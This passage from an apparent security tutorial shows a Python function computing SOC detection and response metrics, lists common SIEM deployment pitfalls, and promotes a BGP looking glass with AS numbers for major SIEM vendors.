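        "mttd_minutes": mean(detect),
        "mttr_minutes": mean(respond),
        "alert_precision": len(incidents) / total_alerts,
    }


t0 = datetime(2025, 3, 15, 9, 0)
incidents = [
    {"first_event": t0, "alerted": t0 + timedelta(minutes=30),
     "contained": t0 + timedelta(minutes=40)},
    {"first_event": t0, "alerted": t0 + timedelta(minutes=50),
     "contained": t0 + timedelta(minutes=70)},
]
metrics = soc_metrics(incidents, total_alerts=10)
print(metrics)
```

With two confirmed incidents out of ten alerts, this example sits exactly at the 20% mark.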
Common SIEM Pitfalls
- Collecting everything without a plan -- ingesting every possible log source without understanding what detection use cases each source enables. This wastes storage, increases cost, and makes the SIEM harder to operate. Start with high-value sources (authentication, network perimeter, endpoints) and expand based on specific detection gaps.
- Alert fatigue -- too many low-quality alerts desensitize analysts. Every alert should have a clear response procedure; alerts without actionable responses should be tuned, suppressed, or converted to dashboards.
- Set and forget -- SIEM rules need continuous tuning as the environment changes. New applications, infrastructure changes, and evolving attack techniques all require rule updates.
- No testing -- detection rules that have never been tested against simulated attacks may not work when a real attack occurs. Regular purple team exercises (offensive team + defensive team collaborating) validate SIEM detections.
- Inadequate log normalization -- without proper normalization, correlation rules must account for every possible field name variation, making them brittle and incomplete.
See It in Action
SIEM platforms ingest data from across the global internet infrastructure, including BGP routing events, IDS/IPS alerts, and WAF logs. Many organizations correlate BGP anomalies (route hijacks, route leaks) with SIEM data to detect sophisticated network-layer attacks. Use the god.ad BGP Looking Glass to explore the networks of major SIEM vendors and the infrastructure that generates the security telemetry these platforms analyze:
- AS36517 -- Splunk (now part of Cisco)
- AS8075 -- Microsoft (Microsoft Sentinel)
- AS15169 -- Google (Chronicle Security)
- AS14618 -- AWS (Security Lake, GuardDuty)
- AS36459 -- GitHub, a major target of security monitoring whose activity also generates telemetry that SIEMs consume
Every connection, every DNS query, every authentication event traversing the BGP-routed internet generates data that feeds into SIEM platforms worldwide. Look up any AS number or IP address to see the routing paths these events traverse on their way from source to SIEM.